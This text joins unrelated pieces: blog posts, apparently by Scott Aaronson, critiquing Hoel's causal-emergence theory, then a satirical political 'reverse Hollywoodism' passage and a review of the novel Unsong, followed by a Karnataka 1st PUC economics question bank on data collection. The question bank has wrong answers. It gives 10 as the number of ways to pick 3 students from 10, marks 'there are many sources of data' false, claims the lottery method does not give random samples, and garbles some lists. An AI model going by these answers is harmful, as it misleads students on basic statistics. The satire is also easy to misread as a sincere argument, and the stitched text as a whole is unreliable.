In their new work, Hoel and others claim to make the amazing discovery that scientific reductionism is false—or, more precisely, that there can exist “causal information” in macroscopic systems, information relevant for predicting the systems’ future behavior, that’s not reducible to causal information about the systems’ microscopic building blocks. For more about what we’ll be discussing, see Hoel’s FQXi essay “Agent Above, Atom Below,” or better yet, his paper in Entropy, When the Map Is Better Than the Territory. Here’s the abstract of the Entropy paper:
The causal structure of any system can be analyzed at a multitude of spatial and temporal scales. It has long been thought that while higher scale (macro) descriptions may be useful to observers, they are at best a compressed description and at worse leave out critical information and causal relationships. However, recent research applying information theory to causal analysis has shown that the causal structure of some systems can actually come into focus and be more informative at a macroscale. That is, a macroscale description of a system (a map) can be more informative than a fully detailed microscale description of the system (the territory). This has been called “causal emergence.” While causal emergence may at first seem counterintuitive, this paper grounds the phenomenon in a classic concept from information theory: Shannon’s discovery of the channel capacity. I argue that systems have a particular causal capacity, and that different descriptions of those systems take advantage of that capacity to various degrees. For some systems, only macroscale descriptions use the full causal capacity. These macroscales can either be coarse-grains, or may leave variables and states out of the model (exogenous, or “black boxed”) in various ways, which can improve the efficacy and informativeness via the same mathematical principles of how error-correcting codes take advantage of an information channel’s capacity. The causal capacity of a system can approach the channel capacity as more and different kinds of macroscales are considered. Ultimately, this provides a general framework for understanding how the causal structure of some systems cannot be fully captured by even the most detailed microscale description.
Anyway, Wolchover’s popular article quoted various researchers praising the theory of causal emergence, as well as a single inexplicably curmudgeonly skeptic—some guy who sounded like he was so off his game (or maybe just bored with debates about ‘reductionism’ versus ’emergence’?), that he couldn’t even be bothered to engage the details of what he was supposed to be commenting on.
Hoel’s ideas do not impress Scott Aaronson, a theoretical computer scientist at the University of Texas, Austin. He says causal emergence isn’t radical in its basic premise. After reading Hoel’s recent essay for the Foundational Questions Institute, “Agent Above, Atom Below” (the one that featured Romeo and Juliet), Aaronson said, “It was hard for me to find anything in the essay that the world’s most orthodox reductionist would disagree with. Yes, of course you want to pass to higher abstraction layers in order to make predictions, and to tell causal stories that are predictively useful — and the essay explains some of the reasons why.”
After the Quanta piece came out, Sean Carroll tweeted approvingly about the above paragraph, calling me a “voice of reason [yes, Sean; have I ever not been?], slapping down the idea that emergent higher levels have spooky causal powers.” Then Sean, in turn, was criticized for that remark by Hoel and others.
Hoel in particular raised a reasonable-sounding question. Namely, in my “curmudgeon paragraph” from Wolchover’s article, I claimed that the notion of “causal emergence,” or causality at the macro-scale, says nothing fundamentally new. Instead it simply reiterates the usual worldview of science, according to which
1. the universe is ultimately made of quantum fields evolving by some Hamiltonian, but
2. if someone asks (say) “why has air travel in the US gotten so terrible?”, a useful answer is going to talk about politics or psychology or economics or history rather than the movements of quarks and leptons.
But then, Hoel asks, if there’s nothing here for the world’s most orthodox reductionist to disagree with, then how do we find Carroll and other reductionists … err, disagreeing?
I think this dilemma is actually not hard to resolve. Faced with a claim about “causation at higher levels,” what reductionists disagree with is not the object-level claim that such causation exists (I scratched my nose because it itched, not because of the Standard Model of elementary particles). Rather, they disagree with the meta-level claim that there’s anything shocking about such causation, anything that poses a special difficulty for the reductionist worldview that physics has held for centuries. I.e., they consider it true both that
1. my nose is made of subatomic particles, and its behavior is in principle fully determined (at least probabilistically) by the quantum state of those particles together with the laws governing them, and
2. my nose itched.
At least if we leave the hard problem of consciousness out of it—that’s a separate debate—there seems to be no reason to imagine a contradiction between 1 and 2 that needs to be resolved, but “only” a vast network of intervening mechanisms to be elucidated. So, this is how it is that reductionists can find anti-reductionist claims to be both wrong and vacuously correct at the same time.
(Incidentally, yes, quantum entanglement provides an obvious sense in which “the whole is more than the sum of its parts,” but even in quantum mechanics, the whole isn’t more than the density matrix, which is still a huge array of numbers evolving by an equation, just different numbers than one would’ve thought a priori. For that reason, it’s not obvious what relevance, if any, QM has to reductionism versus anti-reductionism. In any case, QM is not what Hoel invokes in his causal emergence theory.)
From reading the philosophical parts of Hoel’s papers, it was clear to me that some remarks like the above might help ward off the forehead-banging confusions that these discussions inevitably provoke. So standard-issue crustiness is what I offered Natalie Wolchover when she asked me, not having time on short notice to go through the technical arguments.
But of course this still leaves the question: what is in the mathematical part of Hoel’s Entropy paper? What exactly is it that the advocates of causal emergence claim provides a new argument against reductionism?
To answer that question, yesterday I (finally) read the Entropy paper all the way through.
Much like Tononi’s integrated information theory was built around a numerical measure called Φ, causal emergence is built around a different numerical quantity, this one supposed to measure the amount of “causal information” at a particular scale. The measure is called effective information or EI, and it’s basically the mutual information between a system’s initial state sI and its final state sF, assuming a uniform distribution over sI. Much like with Φ in IIT, computations of this EI are then used as the basis for wide-ranging philosophical claims—even though EI, like Φ, has aspects that could be criticized as arbitrary, and as not obviously connected with what we’re trying to understand.
Once again like with Φ, one of those assumptions is that of a uniform distribution over one of the variables, sI, whose relatedness we’re trying to measure. In my IIT post, I remarked on that assumption, but I didn’t harp on it, since I didn’t see that it did serious harm, and in any case my central objection to Φ would hold regardless of which distribution we chose. With causal emergence, by contrast, this uniformity assumption turns out to be the key to everything.
For here is the argument from the Entropy paper, for the existence of macroscopic causality that’s not reducible to causality in the underlying components. Suppose I have a system with 8 possible states (called “microstates”), which I label 1 through 8. And suppose the system evolves as follows: if it starts out in states 1 through 7, then it goes to state 1. If, on the other hand, it starts in state 8, then it stays in state 8. In such a case, it seems reasonable to “coarse-grain” the system, by lumping together initial states 1 through 7 into a single “macrostate,” call it A, and letting the initial state 8 comprise a second macrostate, call it B.
We now ask: how much information does knowing the system’s initial state tell you about its final state? If we’re talking about microstates, and we let the system start out in a uniform distribution over microstates 1 through 8, then 7/8 of the time the system goes to state 1. So there’s just not much information about the final state to be predicted—specifically, only 7/8×log2(8/7) + 1/8×log2(8) ≈ 0.54 bits of entropy—which, in this case, is also the mutual information between the initial and final microstates. If, on the other hand, we’re talking about macrostates, and we let the system start in a uniform distribution over macrostates A and B, then A goes to A and B goes to B. So knowing the initial macrostate gives us 1 full bit of information about the final state, which is more than the ~0.54 bits that looking at the microstate gave us! Ergo reductionism is false.
Once the argument is spelled out, it’s clear that the entire thing boils down to, how shall I put this, a normalization issue. That is: we insist on the uniform distribution over microstates when calculating microscopic EI, and we also insist on the uniform distribution over macrostates when calculating macroscopic EI, and we ignore the fact that the uniform distribution over microstates gives rise to a non-uniform distribution over macrostates, because some macrostates can be formed in more ways than others. If we fixed this, demanding that the two distributions be compatible with each other, we’d immediately find that, surprise, knowing the complete initial microstate of a system always gives you at least as much power to predict the system’s future as knowing a macroscopic approximation to that state. (How could it not? For given the microstate, we could in principle compute the macroscopic approximation for ourselves, but not vice versa.)
The closest the paper comes to acknowledging the problem—i.e., that it’s all just a normalization trick—seems to be the following paragraph in the discussion section:
Another possible objection to causal emergence is that it is not natural but rather enforced upon a system via an experimenter’s application of an intervention distribution, that is, from using macro-interventions. For formalization purposes, it is the experimenter who is the source of the intervention distribution, which reveals a causal structure that already exists. Additionally, nature itself may intervene upon a system with statistical regularities, just like an intervention distribution. Some of these naturally occurring input distributions may have a viable interpretation as a macroscale causal model (such as being equal to Hmax [the maximum entropy] at some particular macroscale). In this sense, some systems may function over their inputs and outputs at a microscale or macroscale, depending on their own causal capacity and the probability distribution of some natural source of driving input.
As far as I understand it, this paragraph is saying that, for all we know, something could give rise to a uniform distribution over macrostates, so therefore that’s a valid thing to look at, even if it’s not what we get by taking a uniform distribution over microstates and then coarse-graining it. Well, OK, but unknown interventions could give rise to many other distributions over macrostates as well. In any case, if we’re directly comparing causal information at the microscale against causal information at the macroscale, it still seems reasonable to me to demand that in the comparison, the macro-distribution arise by coarse-graining the micro one. But in that case, the entire argument collapses.
Despite everything I said above, the real purpose of this post is to announce that I’ve changed my mind. I now believe that, while Hoel’s argument might be unsatisfactory, the conclusion is fundamentally correct: scientific reductionism is false. There is higher-level causation in our universe, and it’s 100% genuine, not just a verbal sleight-of-hand. In particular, there are causal forces that can only be understood in terms of human desires and goals, and not in terms of subatomic particles blindly bouncing around.
So what caused such a dramatic conversion?
By 2015, after decades of research and diplomacy and activism and struggle, 196 nations had finally agreed to limit their carbon dioxide emissions—every nation on earth besides Syria and Nicaragua, and Nicaragua only because it thought the agreement didn’t go far enough. The human race had thereby started to carve out some sort of future for itself, one in which the oceans might rise slowly enough that we could adapt, and maybe buy enough time until new technologies were invented that changed the outlook. Of course the Paris agreement fell far short of what was needed, but it was a start, something to build on in the coming decades. Even in the US, long the hotbed of intransigence and denial on this issue, 69% of the public supported joining the Paris agreement, compared to a mere 13% who opposed. Clean energy was getting cheaper by the year. Most of the US’s largest corporations, including Google, Microsoft, Apple, Intel, Mars, PG&E, and ExxonMobil—ExxonMobil, for godsakes—vocally supported staying in the agreement and working to cut their own carbon footprints. All in all, there was reason to be cautiously optimistic that children born today wouldn’t live to curse their parents for having brought them into a world so close to collapse.
In order to unravel all this, in order to steer the heavy ship of destiny off the path toward averting the crisis and toward the path of existential despair, a huge number of unlikely events would need to happen in succession, as if propelled by some evil supernatural force.
Like what? I dunno, maybe a fascist demagogue would take over the United States on a campaign based on willful cruelty, on digging up and burning dirty fuels just because and even if it made zero economic sense, just for the fun of sticking it to liberals, or because of the urgent need to save the US coal industry, which employs fewer people than Arby’s. Such a demagogue would have no chance of getting elected, you say?
So let’s suppose he’s up against a historically unpopular opponent. Let’s suppose that even then, he still loses the popular vote, but somehow ekes out an Electoral College win. Maybe he gets crucial help in winning the election from a hostile foreign power—and for some reason, pro-American nationalists are totally OK with that, even cheer it. Even then, we’d still probably need a string of additional absurd coincidences. Like, I dunno, maybe the fascist’s opponent has an aide who used to be married to a guy who likes sending lewd photos to minors, and investigating that guy leads the FBI to some emails that ultimately turn out to mean nothing whatsoever, but that the media hyperventilate about precisely in time to cause just enough people to vote to bring the fascist to power, thereby bringing about the end of the world. Something like that.
It’s kind of like, you know that thing where the small population in Europe that produced Einstein and von Neumann and Erdös and Ulam and Tarski and von Karman and Polya was systematically exterminated (along with millions of other innocents) soon after it started producing such people, and the world still hasn’t fully recovered? How many things needed to go wrong for that to happen? Obviously you needed Hitler to be born, and to survive the trenches and assassination plots; and Hindenburg to make the fateful decision to give Hitler power. But beyond that, the world had to sleep as Germany rebuilt its military; every last country had to turn away refugees; the UK had to shut down Jewish immigration to Palestine at exactly the right time; newspapers had to bury the story; government record-keeping had to have advanced just to the point that rounding up millions for mass murder was (barely) logistically possible; and finally, the war had to continue long enough for nearly every European country to have just enough time to ship its Jews to their deaths, before the Allies showed up to liberate mostly the ashes.
In my view, these simply aren’t the sort of outcomes that you expect from atoms blindly interacting according to the laws of physics. These are, instead, the signatures of higher-level causation—and specifically, of a teleological force that operates in our universe to make it distinctively cruel and horrible.
Admittedly, I don’t claim to know the exact mechanism of the higher-level causation. Maybe, as the physicist Yakir Aharonov has advocated, our universe has not only a special, low-entropy initial state at the Big Bang, but also a “postselected final state,” toward which the outcomes of quantum measurements get mysteriously “pulled”—an effect that might show up in experiments as ever-so-slight deviations from the Born rule. And because of the postselected final state, even if the human race naïvely had only (say) a one-in-thousand chance of killing itself off, even if the paths to its destruction all involved some improbable absurdity, like an orange clown showing up from nowhere—nevertheless, the orange clown would show up. Alternatively, maybe the higher-level causation unfolds through subtle correlations in the universe’s initial state, along the lines I sketched in my 2013 essay The Ghost in the Quantum Turing Machine. Or maybe Erik Hoel is right after all, and it all comes down to normalization: if we looked at the uniform distribution over macrostates rather than over microstates, we’d discover that orange clowns destroying the world predominated. Whatever the details, though, I think it can no longer be doubted that we live, not in the coldly impersonal universe that physics posited for centuries, but instead in a tragicomically evil one.
I call my theory reverse Hollywoodism, because it holds that the real world has the inverse of the typical Hollywood movie’s narrative arc. Again and again, what we observe is that the forces of good have every possible advantage, from money to knowledge to overwhelming numerical superiority. Yet somehow good still fumbles. Somehow a string of improbable coincidences, or a black swan or an orange Hitler, show up at the last moment to let horribleness eke out a last-minute victory, as if the world itself had been rooting for horribleness all along. That’s our universe.
I’m fine if you don’t believe this theory: maybe you’re congenitally more optimistic than I am (in which case, more power to you); maybe the full weight of our universe’s freakish awfulness doesn’t bear down on you as it does on me. But I hope you’ll concede that, if nothing else, this theory is a genuinely non-reductionist one.
### Unsong of unsongs
Saturday, May 20th, 2017
On Wednesday, Scott Alexander finally completed his sprawling serial novel Unsong, after a year and a half of weekly updates—incredibly, in his spare time while also working as a full-term resident in psychiatry, and also regularly updating Slate Star Codex, which I consider to be the world’s best blog. I was honored to attend a party in Austin (mirroring parties in San Francisco, Boston, Tel Aviv, and elsewhere) to celebrate Alexander’s release of the last chapter—depending on your definition, possibly the first “fan event” I’ve ever attended.
Like many other nerds I’ve met, I’d been following Unsong almost since the beginning—with its mix of Talmudic erudition, CS humor, puns, and even a shout-out to Quantum Computing Since Democritus (which shows up as Ben Aharon’s Gematria Since Adam), how could I not be? I now count Unsong as one of my favorite works of fiction, and Scott Alexander alongside Rebecca Newberger Goldstein among my favorite contemporary novelists. The goal of this post is simply to prod readers of my blog who don’t yet know Unsong: if you’ve ever liked anything here on Shtetl-Optimized, then I predict you’ll like Unsong, and probably more.
[WARNING: SPOILERS FOLLOW]
Though not trivial to summarize, Unsong is about a world where the ideas of religion and mysticism—all of them, more or less, although with a special focus on kabbalistic Judaism—turn out to be true. In 1968, the Apollo 8 mission leads not to an orbit of the Moon, as planned, but instead to cracking an invisible crystal sphere that had surrounded the Earth for millennia. Down through the crack rush angels, devils, and other supernatural forces. Life on Earth becomes increasingly strange: on the one hand, many technologies stop working; on the other, people can now gain magical powers by speaking various names of God. A worldwide industry arises to discover new names of God by brute-force search through sequences of syllables. And a powerful agency, the eponymous UNSONG (United Nations Subcommittee on Names of God), is formed to enforce kabbalistic copyright law, hunting down and punishing anyone who speaks divine names without paying licensing fees to the theonomic corporations.
As the story progresses, we learn that eons ago, there was an epic battle in Heaven between Good and Evil, and Evil had the upper hand. But just as all seemed lost, an autistic angel named Uriel reprogrammed the universe to run on math and science rather than on God’s love, as a last-ditch strategy to prevent Satan’s forces from invading the sublunary realm. Molecular biology, the clockwork regularity of physical laws, false evidence for a huge and mindless cosmos—all these were retconned into the world’s underpinnings. Uriel did still need to be occasionally involved, but less as a loving god than as an overworked sysadmin: for example, he descended to Mount Sinai to warn humans never to boil goats in their mothers’ milk, because he discovered that doing so (like the other proscribed activities in the Torah, Uriel’s readme file) triggered bugs in the patchwork of code that was holding the universe together. Now that the sky has cracked, Uriel is forced to issue increasingly desperate patches, and even those will only buy a few decades until his math-and-science-based world stops working entirely, with Satan again triumphant.
Anyway, that’s a tiny part of the setup. Through 72 chapters and 22 interludes, there’s world-building and philosophical debates and long kabbalistic digressions. There are battle sequences (the most striking involves the Lubavitcher Rebbe riding atop a divinely-animated Statue of Liberty like a golem). There’s wordplay and inside jokes—holy of holies are there those—including, notoriously, a sequence of cringe-inducing puns involving whales. But in this story, wordplay isn’t just there for the hell of it: Scott Alexander has built an entire fictional universe that runs on wordplay—one where battles between the great masters, the equivalent of the light-saber fights in Star Wars, are conducted by rearranging letters in the sky to give them new meanings. Scott A. famously claims he’s bad at math (though if you read anything he’s written on statistics or logic puzzles, it’s clear he undersells himself). One could read Unsong as Alexander’s book-length answer to the question: what could it mean for the world to be law-governed but not mathematical? What if the Book of Nature were written in English, or Hebrew, or other human languages, and if the Newtons and Einsteins were those who were most adept with words?
I should confess that for me, the experience of reading Unsong was colored by the knowledge that, in his years of brilliant and prolific writing, lighting up the blogosphere like a comet, the greatest risk Scott Alexander ever took (by his own account) was to defend me. It’s like, imagine that in Elizabethan England, you were placed in the stocks and jeered at by thousands for advocating some unpopular loser cause—like, I dunno, anti-cat-burning or something. And imagine that, when it counted, your most eloquent supporter was a then-obscure poet from Stratford-upon-Avon. You’d be grateful to the poet, of course; you might even become a regular reader of his work, even if it wasn’t good. But if the same poet went on to write Hamlet or Macbeth? It might almost be enough for you to volunteer to be scorned and pilloried all over again, just for the honor of having the Bard divert a rivulet of his creative rapids to protesting on your behalf.
Yes, a tiny part of me had a self-absorbed child’s reaction to Unsong: “could Amanda Marcotte have written this? could Arthur Chu? who better to have in your camp: the ideologues du jour of Twitter and Metafilter, Salon.com and RationalWiki? Or a lone creative genius, someone who can conjure whole worlds into being, as though graced himself with the Shem haMephorash of which he writes?” Then of course I’d catch myself, and think: no, if you want to be in Scott Alexander’s camp, then the only way to do it is to be in nobody’s camp. If two years ago it was morally justified to defend me, then the reasons why have nothing to do with the literary gifts of any of my defenders. And conversely, the least we can do for Unsong is to judge it by what’s on the page, rather than as a soldier in some army fielded by the Gray Tribe.
So in that spirit, let me explain some of what’s wrong with Unsong. That it’s a first novel sometimes shows. It’s brilliant on world-building and arguments and historical tidbits and jokes, epic on puns, and uneven on character and narrative flow. The story jumps around spasmodically in time, so much so that I needed a timeline to keep track of what was happening. Subplots that are still open beget additional subplots ad headacheum, like a string of unmatched left-parentheses. Even more disorienting, the novel changes its mind partway through about its narrative core. Initially, the reader is given a clear sense that this is going to be a story about a young Bay Area kabbalist named Aaron Smith-Teller, his not-quite-girlfriend Ana, and their struggle for supernatural fair-use rights. Soon, though, Aaron and Ana become almost side characters, their battle against UNSONG just one subplot among many, as the focus shifts to the decades-long war between the Comet King, a messianic figure come to rescue humanity, and Thamiel, the Prince of Hell. For the Comet King, even saving the earth from impending doom is too paltry a goal to hold his interest much. As a strict utilitarian and fan of Peter Singer, the Comet King’s singleminded passion is destroying Hell itself, and thereby rescuing the billions of souls who are trapped there for eternity.
Anyway, unlike the Comet King, and unlike a certain other Scott A., I have merely human powers to marshal my time. I also have two kids and a stack of unwritten papers. So let me end this post now. If the post causes just one person to read Unsong who otherwise wouldn’t have, it will be as if I’ve nerdified the entire world.
### Me at the Science March today, in front of the Texas Capitol in Austin
Saturday, April 22nd, 2017 | 2017-11-21 10:05:50 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4379659593105316, "perplexity": 3068.646865651825}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-47/segments/1510934806338.36/warc/CC-MAIN-20171121094039-20171121114039-00060.warc.gz"} |
https://ktbssolutions.com/1st-puc-economics-question-bank-chapter-2-part-1/ | # 1st PUC Economics Question Bank Chapter 2 Collection of Data
Students can Download Economics Chapter 2 Collection of Data Questions and Answers, Notes Pdf, 1st PUC Economics Question Bank with Answers helps you to revise the complete Karnataka State Board Syllabus and score more marks in your examinations.
## Karnataka 1st PUC Economics Question Bank Chapter 2 Collection of Data
### 1st PUC Economics Collection of Data TextBook Questions and Answers
Question 1.
Frame at least four appropriate multiple-choice options for the following questions.
i) Which of the following is the most important when you buy a new dress?
1. Colour
2. Price
3. Brand
4. Quality of cloth
ii) How often do you use computers?
1. Every day
2. 6 times a week
3. 4 times a week
4. 2 times a week:
iii) Which of the following newspapers / do you read regularly?
• The Times of India
• The Hindu
• Indian Express
• Any other.
iv) Rise in the price of petrol is justified?
• Yes
• No
• Don’t Know
• None of the above.
v) What is the monthly income of your family?
1. Less than Rs. 10,000
2. Rs. 10,000 to Rs.20,000
3. Rs.20,000 to Rs.30,000
4. More than Rs.30,000
Question 2.
Frame five two-way questions (with ‘yes’ or ‘no’)
1. Do you own car?
2. Do you smoke?
3. Do you own two-wheeler?
4. Have you visited any foreign country?
5. Are you satisfied with your present income?
Question 3.
There are many sources of data (true/false)?
i) There are many sources of data (true/false)
False.
ii) Telephone survey is the most suitable method of collecting data, when the population is literate and spread over a large area (true/false)
False.
iii) Data collected by investigator is called the secondary data (true/false).
False.
iv) There is a certain bias involved in the non-random selection of samples (true/false)
True.
v) Non-sampling errors can be minimised by taking large samples (true / false)
False.
Question 4.
What do you think about the following questions. Do you find any problem with these questions? If yes, how?
i) How for do you live from the closest market?
The question is not clear. The question can’t clarify how to show distance.
ii) If plastic bags are only 5 percent of our garbage, should it be banned?
The question is too long which discourages people to answer and also it gives a clue about how the respondent should answer.
iii) Wouldn’t you be opposed to increase in price of petrol.
The question contains two negatives which creates confusion to the respondents and may lead to biased reports.
iv)
1. Do you agree with use of chemical fertilisers?
2. Do you use fertilisers in your fields?
3. What is the yield per hectare in your fields?
The order of questions is incorrect. First, general questions should be asked then specific. The correct order should be:
1. What is the yield per hectare in your field?
2. Do you use fertilisers in your fields?
3. Do you agree with the use of chemical fertilisers?
Question 5.
You want do research on the popularity of Vegetable Atta Noodles among children. Design a suitable questionnaire for collecting this information.
Name :_________________________
Age :_________
Sex :
1. Do you eat noodles?
2. Do you like Vegetable Atta Noodles more than other snacks?
3. How many packets do you consume in one month?
4. Do you prefer Atta noodles over Maida noodles?
5. Which vegetable according to you should be added in present Atta noodles?
_____________________________
6. When do you prefer to have vegetable Atta Noodles?
7. Do your parents accompany you while having noodles?
Question 6.
In a village of200 farms, a study was conducted to find the cropping pattern. Out of the 50 farms surveyed 50% grew only wheat. Identify the population and the sample here.
Population or the universe in statistics means totality of the items under study so, the population here is 200 farms. Samples refers to a group or section of the population from which information is to be obtained. Out of 200 farms, only 50 farms are selected for survey. Therefore, the sample population is 50 farms.
Question 7.
Suppose there are 10 students in your class. You want to select three out of them. How many samples are possible?
There can be 10 samples.
Question 8.
Discuss how you would use the lottery method to select 3 students out of 10 in your class?
Selecting 3 students out of 10 by lottery method. We shall select 3 students out of 10 by lottery method on the following way:
1. Make ten paper slips with name of each student of equal size.
2. Now there are ten cards available.
3. Mix them well in a bowl.
4. Now draw three slips at random without replacement one by one. By this method we can select 3 students.
Question 9.
Does the lottery method always give you a random sample? Explain.
No, the lottery method does not always give us a random sample because this method is based on chances.
Question 10.
Explain the procedure of selecting a random sample of 3 students out of 10 in your class, by using random number tables?
For selecting a random samples of 3 students out of 10 by random number tables we consult one digit random numbers and we will skip random numbers greater than the value 10 as it the largest social number. We have other 9 one digit numbers. Thus the 3 selected students out of 10 are with serial numbers 5,9,2.
Question 11.
Do samples provide better results than surveys?
Sample provide better results than surveys because
1. a sample can provide reasonably reliable and accurate information at a lower cost and shorter time.
2. as samples are smaller than population, more detailed information can be collected by conducting intensive enquiries.
3. sample need a smaller team of enumerators, it is easier to train them and supervise their work more effectively.
1st PUC Economics Collection of Data Very Short Answer Type Questions
Question 1.
What is the purpose of data collection?
The purpose of data collection is to provide information regarding a specific topic or a problem.
Question 2.
What are economic variables?
The economic variables are those observations which help on changing time to time, ex: literacy rate,
OR
The economic variables are those values which keep on changing time to time.
Question 3.
Give the meaning of primary data?
When the data is collected for the first time by an investigator or institution it is called as primary data.
Question 4.
What do you mean by personal interview?
When the data is collected directly by the investigator from the individuals or people through interview it is called as personal interview.
Question 5.
Expand NSSO?
NSSO – National Sample Survey Organisation.
Question 6.
Expand CSO?
CSO – Central Statistical Office.
Question 7.
Expand CMIE?
CMIE – Centre for Monitoring Indian Economy.
Question 8.
What is Raw Data?
The data which is not organised or unclassified can be called as Raw Data.
Question 9.
What is Quantitative Classification ?
When the data are classified on the basis of certain characteristics like weight, height, income, age, production, marks etc., is called as quantitative classification.
Question 10.
What is Qualitative Classification?
When the data are classified on the basis of attributes or qualities is called as ‘qualitative classificatioan’
Question 11.
Give the formula for the calculation of a range?
Range = L – S
where L is the largest item and S is the smallest item.
Question 12.
What do you mean by class limit?
A Class limit contains both class limits as parts of class interval.
Question 13.
Give the meaning of frequency Array?
Frequency Array refers to classification of data for a discrete variable. It classifies the data which is not a continuous one.
Question 14.
Define secondary data?
When we use the data which will be already collected by some investigator or individuals it can be called as secondary data.
Question 15.
What will be the kind of data published by the Railway department regarding the progress of railways for an investigator?
Secondary data.
Question 16.
What kind of data are contained on the census of population and nations income estimate, for the Government?
Primary data.
Question 17.
What are the main sources of data?
The main sources of data are:
• Primary data
• Secondary data.
Question 18.
Name any two methods of collecting primary data?
The two methods of collecting of primary data are:
• Personal interview
• Telephone interview etc.,
Question 19.
Name the two important sources of secondary data?
The sources of secondary data are:
1. Published sources
2. Unpublished sources.
Question 20.
What is meant by universe?
In statistics universe or population refers to an aggregate of items to be studied for an investigation.
Question 21.
What is meant by Sample?
Sample is only a part of the population or the universe.
Question 22.
What is meant by sample method?
Sample method is that method in which data is collected from part of the sample on a group of items taken from the population for examination and conclusions are drawn on their basis.
1st PUC Economics Collection of Data Short Answer Type Questions
Question 1.
Name two types of data collection?
The two types of data collection:
1. Primary data
2. Secondary data.
Question 2.
Write any two methods of collecting primary data?
The two methods of collecting primary data are:
1. Personal interview method
2. Mailing questionaire method
3. Telephone interviews
Question 3.
Distinguish between census survey and sample survey?
1. Census Survey:
If data are collected for each and every unit of ‘universe or population’ it is called census or the method of complete enumeration.
2. Sample Survey:
Sample survey refers to the method in which data are collected about the samples or a group of items taken from the ‘universe.’
Question 4.
What are published sources of secondary data?
The published sources of secondary data include:
1. International publications.
2. Government Publications.
3. Reports of Commissions and Committees.
4. Semi-Government Publications.
5. Newspapers, Periodicals etc.,
Question 5.
Why sample surveys are preferred most?
1. When it becomes difficult to survey the whole universe, sample survey method is used.
2. Sample survey has more advantages because it provides reliable and accurate information at a lower cost and in a shorter time.
3. They require less energy.
4. Sample survey needs small team of enumerators.
Question 6.
Name the divisions of CSO?
The divisions of CSO:
1. Industrial Statistics Wing
2. Manpower Research Division
3. Population Division.
Question 7.
What do you mean by Spatial classification?
The classification of data on the basis of geographical location such as countries, states, cities, districts etc., is known as spatial classification.
ex: Production of food grains in different states, literacy level in different districts of Karnataka.
Question 8.
Frame at least four appropriate multiple-choice options for the following questions.
i) Which of the following is the most important when you buy a new dress?
1. Colour
2. Price
3. Brand
4. Quality of cloth
ii) How often do you use computers?
1. Every day
2. 6 times a week
3. 4 times a week
4. 2 times a week.
iii) Which of the following newspapers / do you read regularly?
• a) The Times of India
• b) The Hindu
• c) Indian Express
• d) Any other.
iv) Rise in the price of petrol is justified?
• Yes
• No
• Don’t Know
• None of the above.
v) What is the monthly income of your family?
• Less than Rs. 10,000
• Rs. 10,000 to Rs.20,000
• Rs.20,000 to Rs.30,000
• More than Rs.30,000
Question 9.
What are the types of variables? Explain?
There are two types of variables:
1. Continuous variables
2. Discrete variables
1. Continuous variables:
A continuous variable can be assume any numerical value. It may take integral values (1,2,3,4,5,6..) etc.,
2. Discrete variables:
A discrete variable can take only certain values. It jumps from one value to another and values are not continuous.
For example: Number of students in a class. Here students can be 50, 65,90,100 etc.,
Question 10.
Give the formula to calculate class mid-point?
$$\text { Midpoints }=\frac{\text { upper limit }+\text { lower limit }}{2}$$
Question 11.
What is the exclusive method of classification?
Under this method we form classes in such a way that the lower limit of a class coincides with the upper class limit of the previous class.
Question 12.
While preparing the questionnaire what points should keep in mind?
While preparing the questionnaire the points should keep in mind are:
1. The questionnaire should not be too long
2. The number of questions should be as minimum as possible.
3. The series of questions should move from general to specific.
4. The questions should not be complex.
5. The question should not indicate alternatives to the answer.
Question 13.
What are the three basic ways to collecting data?
There are three basic ways of collecting data:
1. Personal interviews:
This method is used when the researcher has access to all the members.
2. Mailing questionnaire:
When the data in a survey are collected by mail, the questionnaire is sent to each individual by mail with a request to complete and return it by given data.
3. Telephone interviews:
In a telephone interview the investigator asks questions over telephone. The advantage of telephone interview are that they are cheaper than personal interview, and can be conducted in a shorter time.
Question 14.
Give advantages and disadvantages of personal interviews mailing questionnaire and telephone interviews?
a) Personal interview
1. Highest response rate
2. Allows use of all types of questions
b) Mailing questionnaire
1. Least expensive
2. Only method to reach remote areas
3. No influence on respondents
4. Maintains anonimity of respondent
5. Best for sensitive questions
c) Telephones
1. Relatively low cost
2. Relatively less influence respondents
3. Relatively high responserate.
a) Personal interview
• Most expensive
• Possibility of influence respondents
b) Mailing questionnaire
• Cannot be used by illiterates
• Long response time
• Does not allow explanation of unambiguous questions
• Reactions cannot be watched.
c) Telephones
• Limited use
• Reactions cannot be watched.
• Possibility of influencing respondents.
1st PUC Economics Collection of Data Long Answer Type Questions
Question 1.
1. personal interviews and
2. mailing questionnaire to respondents?
1. Personal interview:
1. The enumerator can personally explain to the respondent the objective of the enquiry and importance of study.
2. This will help in getting better co-operation of the respondent and in obtaining accurate answers to the questions in the questionnaire.
3. This will save time of the respondent and will keep him in good humour.
• The method of expensive.
• It need a large team of enumerators and spend on their training and travel, besides other expenses on food, stationary, lodging etc.,
2. Mailing questionnaire to respondents:
1. The method of mailing questionnaire to respondents is far more convenient and less expensive.
• The respondents may not understand or misinterpret some questions.
• The respondent may not take enough care to answer all questions correctly.
• The respondent may ignore and not return the questionnaire all.
Question 2.
What are the main sources of errors in the collection of data?
Primary data are obtained by a study specifically designed to fulfil the data needs of the problems at hand.
Data which are not originally collected but rather obtain from published or unpublished sources are known as secondary data.
The difference between primary and secondary data is only of degree. Data which are primary in the name of one become secondary in the hands of another.
The main sources of error in the collection of data are as follows:
• Due to direct personal interview
• Due to indirect oral interview
• Information from correspondents may be misleading.
• Mailed questionnaire may not be properly answered.
• Scheduled sent through enumerators, may give wrong information.
Question 3.
Explain the meaning of ‘statistical enquiry’?
The term enquiry means search for information or knowledge statistical methods such as collection of data analysis etc., Whenever a statistical enquiry is conducted, it is necessary to collect numerical data.
